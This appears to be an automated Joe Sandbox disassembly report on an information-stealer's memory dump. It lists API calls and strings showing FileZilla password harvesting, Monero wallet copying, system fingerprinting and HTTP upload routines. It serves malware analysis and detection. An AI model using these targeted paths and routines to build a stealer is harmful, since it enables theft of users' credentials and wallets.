Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Function 00401120 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136C7,0041D6E3), ref: 0040112A

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Function 0040EA90 Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 363
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC

strtok_s.MSVCRT ref: 0040EB5B
memset.MSVCRT ref: 0040EF17

Part of subcall function 00414F90: malloc.MSVCRT ref: 00414F98
Part of subcall function 00414F90: strncpy.MSVCRT ref: 00414FB3

strtok_s.MSVCRT ref: 0040EEB9

Strings

url: , xrefs: 0040EDB7
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
<Port>, xrefs: 0040EC06
profile: null, xrefs: 0040EDA8
browser: FileZilla, xrefs: 0040ED99
<Pass encoding="base64">, xrefs: 0040EC9A
password: , xrefs: 0040EE3B
login: , xrefs: 0040EE0A
<User>, xrefs: 0040EC50
<Host>, xrefs: 0040EBBC

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$CreateFilemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 3231967870-555421843
Opcode ID: 489a7f7cc9637b2c82200a4530384bc57c47cdf822d98bf66286bb34a8f263e4
Instruction ID: 10aecec93405882a833e9d9485586b9c386d2bb01b463c9373d799a08db88930
Opcode Fuzzy Hash: 489a7f7cc9637b2c82200a4530384bc57c47cdf822d98bf66286bb34a8f263e4
Instruction Fuzzy Hash: 63D160B1D10208ABCB14EBE5DD5AEEE7739AF54304F50445EF102B7091EF38AA85CB68

Function 00404DC0 Relevance: 21.6, APIs: 4, Strings: 8, Instructions: 569
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

memcpy.MSVCRT ref: 00405443
memcpy.MSVCRT ref: 0040546A
memcpy.MSVCRT ref: 004054A5
InternetCloseHandle.WININET(00000000), ref: 00405565

Strings

", xrefs: 00405278
", xrefs: 00405136
------, xrefs: 004051AD
------, xrefs: 004052EF
--, xrefs: 00404F34
------, xrefs: 00404F4B
", xrefs: 004053BA
------, xrefs: 0040506B

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memcpy$Internet$CloseCrackHandle
String ID: ------$"$"$"$--$------$------$------
API String ID: 3570816027-2774362122
Opcode ID: 986c0e68d7692892564c001fb7bbb2bcf3692c89ef249ef71dd47b09185fb6a4
Instruction ID: 260f85c3a7b9c22eb7c1cbdcbe243c599936c16c4da1d0bdd96b1b8683ee68d2
Opcode Fuzzy Hash: 986c0e68d7692892564c001fb7bbb2bcf3692c89ef249ef71dd47b09185fb6a4
Instruction Fuzzy Hash: DE324472920118ABDB14EBA1EC51FEE7779BF54704F4141AEF10663092DF386A89CF68

Function 00405610 Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 493
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

memcpy.MSVCRT ref: 00405B73
memcpy.MSVCRT ref: 00405BAB
InternetCloseHandle.WININET(00000000), ref: 00405C5D

Strings

-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
------, xrefs: 004058BB
", xrefs: 00405AC6
-A, xrefs: 00405620, 00405D27, 00405623
------, xrefs: 00405746
", xrefs: 00405985
------, xrefs: 004059FC

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetmemcpy$CloseCrackHandle
String ID: "$"$------$------$------$-A$-A
API String ID: 4232662847-602752961
Opcode ID: e248a6d171fee7cc5e063f3832918ae6c63a0c1435dd41cf8541a619e3e0b0db
Instruction ID: 4cea2b3f58e9905ca9306bda8b5afbbab6785a7940c4f207cd78b75163cb777a
Opcode Fuzzy Hash: e248a6d171fee7cc5e063f3832918ae6c63a0c1435dd41cf8541a619e3e0b0db
Instruction Fuzzy Hash: 22125272920118ABCB14EBA1EC95FDE7779BF54704F4141AEB10663091DF386B89CF68

Function 00404540 Relevance: 18.0, APIs: 5, Strings: 5, Instructions: 479
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000,0041D796,0041D793,0041D792,0041D78F,0041D78E), ref: 004045D5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,00412DA8,00000000,?,0041E01C), ref: 0040477A
HttpOpenRequestA.WININET(00000000,?,?,?,00000000,00000000,00400100,00000000), ref: 004047D5
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetCloseHandle.WININET(00000000), ref: 00404B6D

Strings

", xrefs: 004048B2
------, xrefs: 004047E8
------, xrefs: 0040467D
------, xrefs: 00404929
", xrefs: 004049F3

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$CloseConnectCrackHandleSend
String ID: "$"$------$------$------
API String ID: 261778259-2180234286
Opcode ID: 9aef2688adef0054eb42178e0e3f430083e998b307e5f450403804b96a120915
Instruction ID: 99f9639c76b74e2b4d425d68ffeb60ddafa599b481a1d0e01fc83eaad96a83b3
Opcode Fuzzy Hash: 9aef2688adef0054eb42178e0e3f430083e998b307e5f450403804b96a120915
Instruction Fuzzy Hash: 6E121172A102189BCB14EB51EDA2FDEB739AF54304F5141AEB10663091DF786F89CF68

Function 00414AD0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000,0041D289), ref: 00414B31
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BB3
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C08

Strings

%s\%s, xrefs: 00414BDA
- , xrefs: 00414D30
?, xrefs: 00414B07

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Open$Enum
String ID: - $%s\%s$?
API String ID: 462099255-3278919252
Opcode ID: b3e8fa71e63b718ec78bb4cd1b093fe29aa1f976aa38db649f78ae3c4f5b3af8
Instruction ID: 77965071c7983c65362e3a52fe57adc0589bab7d04e8b41716f89c949d1df689
Opcode Fuzzy Hash: b3e8fa71e63b718ec78bb4cd1b093fe29aa1f976aa38db649f78ae3c4f5b3af8
Instruction Fuzzy Hash: 63710A7290011C9BDB64DF64DD95FEA73B9BF48304F0086D9A109A6181DF74ABCACF94

Function 004012D0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 139
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297

CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,?,?,00000000,\Monero\wallet.keys,0041D7D6), ref: 00401425

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Strings

wallet_path, xrefs: 004012F0
.keys, xrefs: 0040132B
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
\Monero\wallet.keys, xrefs: 0040134D

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$memset$CopyCreateDeleteOpen
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2352792059-218353709
Opcode ID: 028f6780ff36c97d356c26d4edfb74f41aabc9d1e11fd91703731d0a91c30999
Instruction ID: 5d490c6449714263bfa30795d1e327336bc1c4210b7fb88950b90d0c4b924f2e
Opcode Fuzzy Hash: 028f6780ff36c97d356c26d4edfb74f41aabc9d1e11fd91703731d0a91c30999
Instruction Fuzzy Hash: 9E5123B1D5011957CB25EB61ED92BED733D9F54304F4041EDB60A62091DE386BC5CF58

Function 00414950 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414985
__aulldiv.LIBCMT ref: 0041499F
__aulldiv.LIBCMT ref: 004149AD

Strings

@, xrefs: 0041497A
%d MB, xrefs: 004149D0

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __aulldiv$GlobalMemoryStatus
String ID: %d MB$@
API String ID: 2185283323-3474575989
Opcode ID: a20d0a6a5635da1d062ac6d6d21c57d3294084c3a9f838a70f234ac636bd73c4
Instruction ID: 576a2b170799144a77153bc894e9100f7829ff7fce93c8fd51003b5824c24931
Opcode Fuzzy Hash: a20d0a6a5635da1d062ac6d6d21c57d3294084c3a9f838a70f234ac636bd73c4
Instruction Fuzzy Hash: EE111EB0D40208ABDB10DFE4CC49FAF77B9BB48705F504549F605BB280D7B8A9418B99

Function 00416230 Relevance: 8.2, APIs: 5, Instructions: 674
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041665D
LoadLibraryA.KERNEL32(?,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666E
LoadLibraryA.KERNEL32(?,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416692
LoadLibraryA.KERNEL32(?,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C7
LoadLibraryA.KERNEL32(?,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D8

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 947c387a777e547b3b80cfca9d9ac6e1d0b6ff9d243eb6caca7e8c3fc68be968
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 2A623FB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Function 004141B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041420C

Strings

\, xrefs: 004141ED
C, xrefs: 004141D9
:, xrefs: 004141E9

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID: :$C$\
API String ID: 2039140958-3809124531
Opcode ID: 6783b40c8081373db278c4331925e050d3cc03f0062e20236e6648280029fa0b
Instruction ID: e9db0a5fb1af0759de8f7002c2e4f3ac64138b722e188ca6fed7a4a209b0fc5c
Opcode Fuzzy Hash: 6783b40c8081373db278c4331925e050d3cc03f0062e20236e6648280029fa0b
Instruction Fuzzy Hash: A131A8B0D002489BDF20DFA4DC45BEEB7B4AF48704F004099F54967281DB78AAD5CF99

Function 00404C70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetCloseHandle.WININET(c.A), ref: 00404D75

Strings

c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74
c.A, xrefs: 00404CC1, 00404DA0

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateCloseHandleHeapInternet
String ID: c.A$c.A
API String ID: 12188218-270182787
Opcode ID: f07d3138cdc9f2291b339d8fcb036eb3dc1056d82dd4218ce48c98c51a6bad2c
Instruction ID: 5cc9c68f5f0c855eb5c76b322cf1169aada13ce2591ea04d1cda96019f80923d
Opcode Fuzzy Hash: f07d3138cdc9f2291b339d8fcb036eb3dc1056d82dd4218ce48c98c51a6bad2c
Instruction Fuzzy Hash: 0731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081E9B709A7281DB746AC58F98

Function 004011E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __aulldiv$GlobalMemoryStatus
String ID: @
API String ID: 2185283323-2766056989
Opcode ID: 4ba05935f44ab2b4d789e44d08bf17577f3e6861a985c5d0a50b09be66756692
Instruction ID: 45440d4ce8d5376c626ba9dfc11109ed1a6213c22ef63cd59a69290e8d137516
Opcode Fuzzy Hash: 4ba05935f44ab2b4d789e44d08bf17577f3e6861a985c5d0a50b09be66756692
Instruction Fuzzy Hash: 1A01FFB0940208EBDB10EFD0CD4AB9EBBB8AB54705F204059E605B61D0D67855458759

Function 00415EC0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 212
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,004136B0), ref: 004160FA
LoadLibraryA.KERNEL32(?,?,004136B0), ref: 0041612F

Strings

NtQueryInformationProcess, xrefs: 0041620A

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 1029625771-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 3734aeff5edd822e51619b29fc72ad227a81f6172f231983ee8f235523a2dd82
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 92A171B5910E10AFC374DFA8FE88A1637BBBBCC3117016519A60AC72A0DF759482CF95

Function 004093A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: '@$'@
API String ID: 823142352-345573653
Opcode ID: 75af371a381a882a097e2d5ecd4109d6bb290d6dfe5664903fe93d82bad93bc3
Instruction ID: 2c3313cc846e8cace8267d97e49fc8a2b01df18f2572e32a86dabcb1b5362a0e
Opcode Fuzzy Hash: 75af371a381a882a097e2d5ecd4109d6bb290d6dfe5664903fe93d82bad93bc3
Instruction Fuzzy Hash: 1631EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Function 004132F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteEx.SHELL32(0000003C,00000000,?,?,00000000,?,?,?), ref: 004133E6
ExitProcess.KERNEL32(00000000,?,000003E8,0000003C,0000003C), ref: 00413415

Strings

<, xrefs: 00413399

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: <
API String ID: 1124553745-4251816714
Opcode ID: bff5fc72ea876747fa3ef81292441ddf66a0489c7733ee2038740061970924b5
Instruction ID: 7c753d1cd194e608febe90dda36367acae2f12d203da6cf709855ee929f045ad
Opcode Fuzzy Hash: bff5fc72ea876747fa3ef81292441ddf66a0489c7733ee2038740061970924b5
Instruction Fuzzy Hash: B1314FB19012189BCB24EF91DD92BDDBB78AF48304F80419EF20967191DF746B89CF98

Function 00414B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BB3
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C08
RegQueryValueExA.KERNEL32(00000000,?,00000000,000F003F,?,00000400), ref: 00414C79
RegQueryValueExA.KERNEL32(00000000,?,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D26
RegCloseKey.KERNEL32(00000000), ref: 00414D95

Strings

%s\%s, xrefs: 00414BDA

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseEnumOpen
String ID: %s\%s
API String ID: 2041898428-4073750446
Opcode ID: 79e7d88f4740ee7c05a0adca2a9bf403eef398d561464b03bedf5b8159ff4625
Instruction ID: 90a0c31323359f695dbcfeb3cf79dc538b919cf5f0382a2885d7616cf2870a5d
Opcode Fuzzy Hash: 79e7d88f4740ee7c05a0adca2a9bf403eef398d561464b03bedf5b8159ff4625
Instruction Fuzzy Hash: AE213875900218ABDB64CF54DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFA4

Function 00404470 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FE0: malloc.MSVCRT ref: 00414FE8

InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetmalloc
String ID: <
API String ID: 1832218326-4251816714
Opcode ID: d98cf0deba3d332ccf865672132b272e00c76c6b460f035ae55ca34495c3aaf9
Instruction ID: 522bfe70756940731c8a55fb627e5381a09ff4e69ffc56460ccf4e42935f5807
Opcode Fuzzy Hash: d98cf0deba3d332ccf865672132b272e00c76c6b460f035ae55ca34495c3aaf9
Instruction Fuzzy Hash: 9A216DB5D00208ABDF10EFA5E845BDD7B74AB44324F004229FA25B72C1EB346A46CB95

Function 004142F0 Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,00000000), ref: 0041432B
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,000000FF,000000FF), ref: 0041434C

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 7703441b58cfb1fc141809da53d6e029f4262b494bf2702c048ea568c542aaa9
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: 46013CB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05A7290DA70AA018B90

Function 00414730 Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,00000000), ref: 0041476B
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,000000FF,000000FF), ref: 0041478C

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: cff109726c73a8670ea0eef732f336ebb4ec6a610c763f62f7b14754f2269efd
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: B1013C75A40608FFDB20DBE4ED49FAEB779EB88700F008159FA05A6290DB705A018F90

Function 004136A0 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136C7,0041D6E3), ref: 0040112A

Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136CC), ref: 004010F2

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226

GetUserDefaultLangID.KERNEL32 ref: 004136D6

Part of subcall function 004143B0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143DC

Part of subcall function 004143F0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041441C

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoLangMemoryNumaStatusSystemVirtual
String ID:
API String ID: 736289943-0
Opcode ID: 380860b77354990305d88688cd8dc0658e064b028ce870432c6298975c1f08e7
Instruction ID: d9c7cf5d3efde66ad109c483208bd2a18715abb46e27a8e1d0e804d8314a4af6
Opcode Fuzzy Hash: 380860b77354990305d88688cd8dc0658e064b028ce870432c6298975c1f08e7
Instruction Fuzzy Hash: 1E315070A00108ABDB14FBE1EC56BEE7779AF48308F50416EF112671D1DF789686C669

Function 00401260 Relevance: 1.5, APIs: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Function 004144A0 Relevance: 1.5, APIs: 1, Instructions: 32timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 004144CA

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: de68a96bfbf015f51ed1ceeaa6da3525d7ad5053711171ec4d4e85c4e1d4f27a
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: 43F06770E047289BDB309B60DD49BA9737ABB44311F0002D5EA0AA3291DB749E85CF87

Function 00415B60 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415B95

Memory Dump Source

Source File: 00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 4972614ad764c1221db8638257e897a7011607b395e2648a135fad29f5ce3b62
Instruction ID: 4c8addbd00fd10208f28eca43ba985643f2d85167dc71f8bf48d2acf12b2b3a6
